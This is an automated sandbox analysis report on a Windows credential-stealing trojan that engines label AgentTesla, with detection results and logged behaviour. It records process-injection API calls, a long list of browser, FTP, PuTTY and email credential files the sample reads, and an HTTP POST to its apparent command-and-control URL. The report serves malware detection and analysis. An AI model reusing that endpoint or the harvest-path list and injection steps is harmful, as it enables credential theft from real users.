SmartHawk

13.8

0-day

56 个模型检测该样本为恶意！

重新分析

下载样本

195c192f3fdaeef5739457859fe3212188b057ef3225657a464907b8c2a78732

6817772729b3db7fbdddb98f5dff3a69.exe

分析耗时

90s

最近分析

文件大小

430.5KB

静态报毒动态报毒 AGENSLA AGENTTESLA AI SCORE=84 AM0@AQYLXHP ATTRIBUTE CONFIDENCE ELDORADO EQGF FAREIT GENERICKD GENKRYPTIK HEAPOVERRIDE HIGH CONFIDENCE HIGHCONFIDENCE HOPLD HRWHVZ KRYPTIK MALICIOUS PE MALWARE@#193GHF9KIG8IS NEGASTEAL PUTTY PWSX QQPASS QQROB RZJBZGNOQUA SCORE SIGGEN2 SUSGEN TESLA THIADBO TROJANPSW UNSAFE WNCP YAKBEEXMSIL ZEMSILF 更多

未检测暂无鹰眼引擎检测结果

查杀引擎	查杀结果	查杀时间	查杀版本
Alibaba	TrojanPSW:MSIL/AgentTesla.6439fbf7	20190527	0.3.0.5
Baidu		20190318	1.0.0.2
Avast	Win32:PWSX-gen [Trj]	20201023	18.4.3895.0
Tencent	Msil.Trojan-qqpass.Qqrob.Wncp	20201023	1.0.0.1
Kingsoft		20201023	2013.8.14.323
McAfee	Fareit-FXO!6817772729B3	20201023	6.0.6.653
CrowdStrike	win/malicious_confidence_80% (W)	20190702	1.0

Queries for the computername (1 个事件)

Time & API	Arguments	Status	Return	Repeated
1619624916.805625 GetComputerNameW	computer_name: OSKAR-PC	success	1	0

Checks if process is being debugged by a debugger (3 个事件)

Time & API	Arguments	Status	Return	Repeated
1619610607.234125 IsDebuggerPresent		failed	0	0
1619610607.234125 IsDebuggerPresent		failed	0	0
1619610652.656125 IsDebuggerPresent		failed	0	0

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 个事件)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

Tries to locate where the browsers are installed (1 个事件)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 个事件)

Time & API	Arguments	Status	Return	Repeated
1619610607.249125 GlobalMemoryStatusEx		success	1	0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (1 个事件)

suspicious_features

POST method with no referer header, HTTP version 1.0 used

suspicious_request

POST http://kboyud.com/doc/five/fre.php

Performs some HTTP requests (1 个事件)

request

POST http://kboyud.com/doc/five/fre.php

Sends data using the HTTP POST Method (1 个事件)

request

POST http://kboyud.com/doc/five/fre.php

Allocates read-write-execute memory (usually to unpack itself) (50 out of 90 个事件)

Time & API	Arguments	Status	Return
1619610606.328125 NtAllocateVirtualMemory	process_identifier: 2520 region_size: 1376256 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) process_handle: 0xffffffff allocation_type: 8192 (MEM_RESERVE) base_address: 0x00870000	success	0
1619610606.328125 NtAllocateVirtualMemory	process_identifier: 2520 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) process_handle: 0xffffffff allocation_type: 4096 (MEM_COMMIT) base_address: 0x00980000	success	0
1619610607.093125 NtAllocateVirtualMemory	process_identifier: 2520 region_size: 1900544 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) process_handle: 0xffffffff allocation_type: 8192 (MEM_RESERVE) base_address: 0x02390000	success	0
1619610607.093125 NtAllocateVirtualMemory	process_identifier: 2520 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) process_handle: 0xffffffff allocation_type: 4096 (MEM_COMMIT) base_address: 0x02520000	success	0
1619610607.156125 NtProtectVirtualMemory	process_identifier: 2520 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) process_handle: 0xffffffff base_address: 0x73b91000	success	0
1619610607.234125 NtAllocateVirtualMemory	process_identifier: 2520 region_size: 2293760 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) process_handle: 0xffffffff allocation_type: 8192 (MEM_RESERVE) base_address: 0x02560000	success	0
1619610607.234125 NtAllocateVirtualMemory	process_identifier: 2520 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) process_handle: 0xffffffff allocation_type: 4096 (MEM_COMMIT) base_address: 0x02750000	success	0
1619610607.234125 NtAllocateVirtualMemory	process_identifier: 2520 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) process_handle: 0xffffffff allocation_type: 4096 (MEM_COMMIT) base_address: 0x003ba000	success	0
1619610607.234125 NtProtectVirtualMemory	process_identifier: 2520 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) process_handle: 0xffffffff base_address: 0x73b92000	success	0
1619610607.234125 NtAllocateVirtualMemory	process_identifier: 2520 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) process_handle: 0xffffffff allocation_type: 4096 (MEM_COMMIT) base_address: 0x003b2000	success	0
1619610607.468125 NtAllocateVirtualMemory	process_identifier: 2520 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) process_handle: 0xffffffff allocation_type: 4096 (MEM_COMMIT) base_address: 0x003c2000	success	0
1619610607.593125 NtAllocateVirtualMemory	process_identifier: 2520 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) process_handle: 0xffffffff allocation_type: 4096 (MEM_COMMIT) base_address: 0x003e5000	success	0
1619610607.593125 NtAllocateVirtualMemory	process_identifier: 2520 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) process_handle: 0xffffffff allocation_type: 4096 (MEM_COMMIT) base_address: 0x003eb000	success	0
1619610607.593125 NtAllocateVirtualMemory	process_identifier: 2520 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) process_handle: 0xffffffff allocation_type: 4096 (MEM_COMMIT) base_address: 0x003e7000	success	0
1619610607.796125 NtAllocateVirtualMemory	process_identifier: 2520 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) process_handle: 0xffffffff allocation_type: 4096 (MEM_COMMIT) base_address: 0x003c3000	success	0
1619610607.828125 NtAllocateVirtualMemory	process_identifier: 2520 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) process_handle: 0xffffffff allocation_type: 4096 (MEM_COMMIT) base_address: 0x003cc000	success	0
1619610607.890125 NtAllocateVirtualMemory	process_identifier: 2520 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) process_handle: 0xffffffff allocation_type: 4096 (MEM_COMMIT) base_address: 0x00820000	success	0
1619610608.531125 NtAllocateVirtualMemory	process_identifier: 2520 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) process_handle: 0xffffffff allocation_type: 4096 (MEM_COMMIT) base_address: 0x003c4000	success	0
1619610608.531125 NtAllocateVirtualMemory	process_identifier: 2520 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) process_handle: 0xffffffff allocation_type: 4096 (MEM_COMMIT) base_address: 0x003c6000	success	0
1619610608.812125 NtAllocateVirtualMemory	process_identifier: 2520 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) process_handle: 0xffffffff allocation_type: 4096 (MEM_COMMIT) base_address: 0x003da000	success	0
1619610608.812125 NtAllocateVirtualMemory	process_identifier: 2520 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) process_handle: 0xffffffff allocation_type: 4096 (MEM_COMMIT) base_address: 0x003d7000	success	0
1619610608.984125 NtAllocateVirtualMemory	process_identifier: 2520 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) process_handle: 0xffffffff allocation_type: 4096 (MEM_COMMIT) base_address: 0x003d6000	success	0
1619610609.015125 NtAllocateVirtualMemory	process_identifier: 2520 region_size: 16384 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) process_handle: 0xffffffff allocation_type: 4096 (MEM_COMMIT) base_address: 0x00821000	success	0
1619610609.281125 NtAllocateVirtualMemory	process_identifier: 2520 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) process_handle: 0xffffffff allocation_type: 4096 (MEM_COMMIT) base_address: 0x00825000	success	0
1619610609.531125 NtAllocateVirtualMemory	process_identifier: 2520 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) process_handle: 0xffffffff allocation_type: 4096 (MEM_COMMIT) base_address: 0x003c7000	success	0
1619610609.562125 NtAllocateVirtualMemory	process_identifier: 2520 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) process_handle: 0xffffffff allocation_type: 4096 (MEM_COMMIT) base_address: 0x003c8000	success	0
1619610650.609125 NtAllocateVirtualMemory	process_identifier: 2520 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) process_handle: 0xffffffff allocation_type: 4096 (MEM_COMMIT) base_address: 0x00826000	success	0
1619610650.656125 NtAllocateVirtualMemory	process_identifier: 2520 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) process_handle: 0xffffffff allocation_type: 4096 (MEM_COMMIT) base_address: 0x02521000	success	0
1619610650.796125 NtAllocateVirtualMemory	process_identifier: 2520 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) process_handle: 0xffffffff allocation_type: 4096 (MEM_COMMIT) base_address: 0x00827000	success	0
1619610650.812125 NtAllocateVirtualMemory	process_identifier: 2520 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) process_handle: 0xffffffff allocation_type: 4096 (MEM_COMMIT) base_address: 0x00828000	success	0
1619610650.906125 NtAllocateVirtualMemory	process_identifier: 2520 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) process_handle: 0xffffffff allocation_type: 4096 (MEM_COMMIT) base_address: 0x003bc000	success	0
1619610650.968125 NtAllocateVirtualMemory	process_identifier: 2520 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) process_handle: 0xffffffff allocation_type: 4096 (MEM_COMMIT) base_address: 0x00829000	success	0
1619610651.015125 NtAllocateVirtualMemory	process_identifier: 2520 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) process_handle: 0xffffffff allocation_type: 4096 (MEM_COMMIT) base_address: 0x003c9000	success	0
1619610651.031125 NtAllocateVirtualMemory	process_identifier: 2520 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) process_handle: 0xffffffff allocation_type: 4096 (MEM_COMMIT) base_address: 0x0082a000	success	0
1619610651.203125 NtProtectVirtualMemory	process_identifier: 2520 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 141824 protection: 64 (PAGE_EXECUTE_READWRITE) process_handle: 0xffffffff base_address: 0x024e0400	failed	3221225550
1619610652.265125 NtAllocateVirtualMemory	process_identifier: 2520 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) process_handle: 0xffffffff allocation_type: 4096 (MEM_COMMIT) base_address: 0x0082b000	success	0
1619610652.265125 NtAllocateVirtualMemory	process_identifier: 2520 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) process_handle: 0xffffffff allocation_type: 4096 (MEM_COMMIT) base_address: 0x00d60000	success	0
1619610652.265125 NtAllocateVirtualMemory	process_identifier: 2520 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) process_handle: 0xffffffff allocation_type: 4096 (MEM_COMMIT) base_address: 0x0082c000	success	0
1619610652.265125 NtAllocateVirtualMemory	process_identifier: 2520 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) process_handle: 0xffffffff allocation_type: 4096 (MEM_COMMIT) base_address: 0x0082d000	success	0
1619610652.265125 NtAllocateVirtualMemory	process_identifier: 2520 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) process_handle: 0xffffffff allocation_type: 4096 (MEM_COMMIT) base_address: 0x0082e000	success	0
1619610652.296125 NtAllocateVirtualMemory	process_identifier: 2520 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) process_handle: 0xffffffff allocation_type: 4096 (MEM_COMMIT) base_address: 0x0082f000	success	0
1619610652.374125 NtAllocateVirtualMemory	process_identifier: 2520 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) process_handle: 0xffffffff allocation_type: 4096 (MEM_COMMIT) base_address: 0x00580000	success	0
1619610652.421125 NtAllocateVirtualMemory	process_identifier: 2520 region_size: 12288 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) process_handle: 0xffffffff allocation_type: 4096 (MEM_COMMIT) base_address: 0x00581000	success	0
1619610652.437125 NtProtectVirtualMemory	process_identifier: 2520 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8 protection: 64 (PAGE_EXECUTE_READWRITE) process_handle: 0xffffffff base_address: 0x024e0178	failed	3221225550
1619610652.437125 NtProtectVirtualMemory	process_identifier: 2520 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8 protection: 64 (PAGE_EXECUTE_READWRITE) process_handle: 0xffffffff base_address: 0x024e01a0	failed	3221225550
1619610652.437125 NtProtectVirtualMemory	process_identifier: 2520 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8 protection: 64 (PAGE_EXECUTE_READWRITE) process_handle: 0xffffffff base_address: 0x024e01c8	failed	3221225550
1619610652.437125 NtProtectVirtualMemory	process_identifier: 2520 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8 protection: 64 (PAGE_EXECUTE_READWRITE) process_handle: 0xffffffff base_address: 0x024e01f0	failed	3221225550
1619610652.437125 NtProtectVirtualMemory	process_identifier: 2520 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8 protection: 64 (PAGE_EXECUTE_READWRITE) process_handle: 0xffffffff base_address: 0x024e0218	failed	3221225550
1619610652.437125 NtProtectVirtualMemory	process_identifier: 2520 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 11 protection: 64 (PAGE_EXECUTE_READWRITE) process_handle: 0xffffffff base_address: 0x025036de	failed	3221225550
1619610652.437125 NtProtectVirtualMemory	process_identifier: 2520 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 11 protection: 64 (PAGE_EXECUTE_READWRITE) process_handle: 0xffffffff base_address: 0x025036d2	failed	3221225550

Steals private information from local Internet browsers (19 个事件)

file	C:\Users\Administrator.Oskar-PC\AppData\Local\Google\Chrome\User Data\Default\Login Data
file	C:\Users\Administrator.Oskar-PC\AppData\Roaming\Opera\Opera Next\data\User Data\Default\Login Data
file	C:\Users\Administrator.Oskar-PC\AppData\Roaming\Opera\Opera Next\data\User Data\Default\Web Data
file	C:\Users\Administrator.Oskar-PC\AppData\Roaming\Opera\Opera Next\data\Login Data
file	C:\Users\Administrator.Oskar-PC\AppData\Roaming\Opera\Opera Next\data\Default\Login Data
file	C:\Users\Administrator.Oskar-PC\AppData\Local\Chromium\User Data\Default\Login Data
file	C:\Users\Administrator.Oskar-PC\AppData\Local\Chromium\User Data\Default\Web Data
file	C:\Users\Administrator.Oskar-PC\AppData\Local\MapleStudio\ChromePlus\User Data\Default\Web Data
file	C:\Users\Administrator.Oskar-PC\AppData\LocalMapleStudio\ChromePlus\Login Data
file	C:\Users\Administrator.Oskar-PC\AppData\LocalMapleStudio\ChromePlus\Default\Login Data
file	C:\Users\Administrator.Oskar-PC\AppData\Local\MapleStudio\ChromePlus\User Data\Default\Login Data
file	C:\Users\Administrator.Oskar-PC\AppData\Local\Nichrome\User Data\Default\Web Data
file	C:\Users\Administrator.Oskar-PC\AppData\Local\Nichrome\User Data\Default\Login Data
file	C:\Users\Administrator.Oskar-PC\AppData\Local\RockMelt\User Data\Default\Web Data
file	C:\Users\Administrator.Oskar-PC\AppData\Local\RockMelt\User Data\Default\Login Data
file	C:\Users\Administrator.Oskar-PC\AppData\Local\Yandex\YandexBrowser\User Data\Default\Login Data
file	C:\Users\Administrator.Oskar-PC\AppData\Local\Yandex\YandexBrowser\User Data\Default\Web Data
registry	HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\SeaMonkey
registry	HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox

The binary likely contains encrypted or compressed data indicative of a packer (2 个事件)

entropy

7.694979767832173

section

{'size_of_data': '0x0006b000', 'virtual_address': '0x00002000', 'entropy': 7.694979767832173, 'name': '.text', 'virtual_size': '0x0006af74'}

description

A section with a high entropy has been found

entropy

0.9953488372093023

description

Overall entropy of this PE file is high

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 个事件)

Time & API	Arguments	Status	Return	Repeated
1619610651.187125 LookupPrivilegeValueW	system_name: privilege_name: SeDebugPrivilege	success	1	0

Communicates with host for which no DNS query was performed (1 个事件)

host

172.217.24.14

Allocates execute permission to another process indicative of possible code injection (1 个事件)

Time & API	Arguments	Status	Return	Repeated
1619610652.796125 NtAllocateVirtualMemory	process_identifier: 2412 region_size: 663552 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) process_handle: 0x000033a4 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) base_address: 0x00400000	success	0	0

Harvests credentials from local FTP client softwares (22 个事件)

file	C:\Program Files (x86)\FTPGetter\Profile\servers.xml
file	C:\Users\Administrator.Oskar-PC\AppData\Roaming\FTPGetter\servers.xml
file	C:\Users\Administrator.Oskar-PC\AppData\Roaming\Estsoft\ALFTP\ESTdb2.dat
file	C:\Users\Administrator.Oskar-PC\AppData\Roaming\wcx_ftp.ini
file	C:\Windows\wcx_ftp.ini
file	C:\Users\Administrator.Oskar-PC\AppData\Roaming\GHISLER\wcx_ftp.ini
file	C:\Users\Administrator.Oskar-PC\wcx_ftp.ini
file	C:\Windows\32BitFtp.ini
file	C:\Users\Administrator.Oskar-PC\AppData\Roaming\FileZilla\sitemanager.xml
file	C:\Program Files (x86)\FileZilla\Filezilla.xml
file	C:\Users\Administrator.Oskar-PC\AppData\Roaming\FileZilla\filezilla.xml
file	C:\Users\Administrator.Oskar-PC\AppData\Roaming\FileZilla\recentservers.xml
registry	HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
registry	HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
registry	HKEY_CURRENT_USER\Software\Ghisler\Total Commander
registry	HKEY_CURRENT_USER\Software\VanDyke\SecureFX
registry	HKEY_CURRENT_USER\Software\LinasFTP\Site Manager
registry	HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings
registry	HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions
registry	HKEY_LOCAL_MACHINE\Software\SimonTatham\PuTTY\Sessions
registry	HKEY_CURRENT_USER\Software\Martin Prikryl
registry	HKEY_LOCAL_MACHINE\Software\Martin Prikryl

Harvests information related to installed instant messenger clients (1 个事件)

file	C:\Users\Administrator.Oskar-PC\AppData\Roaming\.purple\accounts.xml

Potential code injection by writing to the memory of another process (3 个事件)

Time & API	Arguments	Status	Return
1619610652.796125 WriteProcessMemory	process_identifier: 2412 buffer: MZÿÿ¸@ðº´ Í!¸LÍ!This program cannot be run in DOS mode. $ÌÍxþ¬¬¬Ô¬K£K¬ ¬=2ó¬¬¬Ô¬¬Ç¬Ô¬=2÷ó¬=2È¬Rich¬PELlWà8¢Þ9P@ ÐdP\.textõ68 `.rdata`@PB<@@.data$^ ~@À.x À process_handle: 0x000033a4 base_address: 0x00400000	success	1
1619610652.796125 WriteProcessMemory	process_identifier: 2412 buffer: TÍ<¨K¢`Ý;U process_handle: 0x000033a4 base_address: 0x0041a000	success	1
1619610652.796125 WriteProcessMemory	process_identifier: 2412 buffer: @ process_handle: 0x000033a4 base_address: 0x7efde008	success	1

Code injection by writing an executable or DLL to the memory of another process (1 个事件)

Time & API	Arguments	Status	Return	Repeated
1619610652.796125 WriteProcessMemory	process_identifier: 2412 buffer: MZÿÿ¸@ðº´ Í!¸LÍ!This program cannot be run in DOS mode. $ÌÍxþ¬¬¬Ô¬K£K¬ ¬=2ó¬¬¬Ô¬¬Ç¬Ô¬=2÷ó¬=2È¬Rich¬PELlWà8¢Þ9P@ ÐdP\.textõ68 `.rdata`@PB<@@.data$^ ~@À.x À process_handle: 0x000033a4 base_address: 0x00400000	success	1	0

Harvests credentials from local email clients (3 个事件)

registry	HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
registry	HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Thunderbird
registry	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook

Used NtSetContextThread to modify a thread in a remote process indicative of process injection (2 个事件)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2520 called NtSetContextThread to modify thread in remote process 2412
1619610652.796125 NtSetContextThread	thread_handle: 0x0000a318 registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4274654 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 process_identifier: 2412	success	0	0

Putty Files, Registry Keys and/or Mutexes Detected

Resumed a suspended thread in a remote process potentially indicative of process injection (2 个事件)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2520 resumed a thread in remote process 2412
1619610652.890125 NtResumeThread	thread_handle: 0x0000a318 suspend_count: 1 process_identifier: 2412	success	0	0

Executed a process and injected code into it, probably while unpacking (19 个事件)

Time & API	Arguments	Status	Return
1619610607.234125 NtResumeThread	thread_handle: 0x000000d8 suspend_count: 1 process_identifier: 2520	success	0
1619610607.234125 NtResumeThread	thread_handle: 0x00000128 suspend_count: 1 process_identifier: 2520	success	0
1619610607.265125 NtResumeThread	thread_handle: 0x0000016c suspend_count: 1 process_identifier: 2520	success	0
1619610652.374125 NtGetContextThread	thread_handle: 0x00000128	success	0
1619610652.374125 NtResumeThread	thread_handle: 0x00000128 suspend_count: 1 process_identifier: 2520	success	0
1619610652.531125 NtResumeThread	thread_handle: 0x00003718 suspend_count: 1 process_identifier: 2520	success	0
1619610652.640125 NtResumeThread	thread_handle: 0x0000339c suspend_count: 1 process_identifier: 2520	success	0
1619610652.796125 CreateProcessInternalW	thread_identifier: 1344 thread_handle: 0x0000a318 process_identifier: 2412 current_directory: filepath: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\6817772729b3db7fbdddb98f5dff3a69.exe track: 1 command_line: "{path}" filepath_r: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\6817772729b3db7fbdddb98f5dff3a69.exe stack_pivoted: 0 creation_flags: 4 (CREATE_SUSPENDED) process_handle: 0x000033a4 inherit_handles: 0	success	1
1619610652.796125 NtGetContextThread	thread_handle: 0x0000a318	success	0
1619610652.796125 NtAllocateVirtualMemory	process_identifier: 2412 region_size: 663552 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) process_handle: 0x000033a4 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) base_address: 0x00400000	success	0
1619610652.796125 WriteProcessMemory	process_identifier: 2412 buffer: MZÿÿ¸@ðº´ Í!¸LÍ!This program cannot be run in DOS mode. $ÌÍxþ¬¬¬Ô¬K£K¬ ¬=2ó¬¬¬Ô¬¬Ç¬Ô¬=2÷ó¬=2È¬Rich¬PELlWà8¢Þ9P@ ÐdP\.textõ68 `.rdata`@PB<@@.data$^ ~@À.x À process_handle: 0x000033a4 base_address: 0x00400000	success	1
1619610652.796125 WriteProcessMemory	process_identifier: 2412 buffer: process_handle: 0x000033a4 base_address: 0x00401000	success	1
1619610652.796125 WriteProcessMemory	process_identifier: 2412 buffer: process_handle: 0x000033a4 base_address: 0x00415000	success	1
1619610652.796125 WriteProcessMemory	process_identifier: 2412 buffer: TÍ<¨K¢`Ý;U process_handle: 0x000033a4 base_address: 0x0041a000	success	1
1619610652.796125 WriteProcessMemory	process_identifier: 2412 buffer: process_handle: 0x000033a4 base_address: 0x004a0000	success	1
1619610652.796125 WriteProcessMemory	process_identifier: 2412 buffer: @ process_handle: 0x000033a4 base_address: 0x7efde008	success	1
1619610652.796125 NtSetContextThread	thread_handle: 0x0000a318 registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4274654 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 process_identifier: 2412	success	0
1619610652.890125 NtResumeThread	thread_handle: 0x0000a318 suspend_count: 1 process_identifier: 2412	success	0
1619624914.852625 NtResumeThread	thread_handle: 0x00000110 suspend_count: 1 process_identifier: 2412	success	0

File has been identified by 56 AntiVirus engines on VirusTotal as malicious (50 out of 56 个事件)

Elastic	malicious (high confidence)
MicroWorld-eScan	Trojan.GenericKD.34350936
FireEye	Generic.mg.6817772729b3db7f
CAT-QuickHeal	Trojan.YakbeexMSIL.ZZ4
Qihoo-360	Generic/Trojan.PSW.374
ALYac	Trojan.GenericKD.34350936
Cylance	Unsafe
VIPRE	Trojan.Win32.Generic!BT
Sangfor	Malware
K7AntiVirus	Trojan ( 0056c6971 )
Alibaba	TrojanPSW:MSIL/AgentTesla.6439fbf7
K7GW	Trojan ( 0056c6971 )
Cybereason	malicious.b7dadd
Arcabit	Trojan.Generic.D20C2758
Invincea	Mal/Generic-S
Cyren	W32/MSIL_Kryptik.BKE.gen!Eldorado
Symantec	ML.Attribute.HighConfidence
APEX	Malicious
Avast	Win32:PWSX-gen [Trj]
Kaspersky	HEUR:Trojan-PSW.MSIL.Agensla.gen
BitDefender	Trojan.GenericKD.34350936
NANO-Antivirus	Trojan.Win32.Agensla.hrwhvz
Paloalto	generic.ml
Tencent	Msil.Trojan-qqpass.Qqrob.Wncp
Ad-Aware	Trojan.GenericKD.34350936
Emsisoft	Trojan.GenericKD.34350936 (B)
Comodo	Malware@#193ghf9kig8is
F-Secure	Trojan.TR/Tesla.hopld
DrWeb	Trojan.PWS.Siggen2.53465
Zillya	Trojan.Kryptik.Win32.2407865
TrendMicro	TrojanSpy.MSIL.NEGASTEAL.THIADBO
McAfee-GW-Edition	BehavesLike.Win32.Generic.gc
Sophos	Mal/Generic-S
Ikarus	Trojan.MSIL.Crypt
Avira	TR/Tesla.hopld
Antiy-AVL	Trojan/MSIL.Kryptik
Microsoft	Trojan:MSIL/AgentTesla.AA!MTB
ZoneAlarm	HEUR:Trojan-PSW.MSIL.Agensla.gen
GData	Trojan.GenericKD.34350936
Cynet	Malicious (score: 100)
AhnLab-V3	Malware/Win32.RL_Generic.C4189484
McAfee	Fareit-FXO!6817772729B3
MAX	malware (ai score=84)
VBA32	CIL.HeapOverride.Heur
Malwarebytes	Trojan.MalPack
ESET-NOD32	a variant of MSIL/Kryptik.XIN
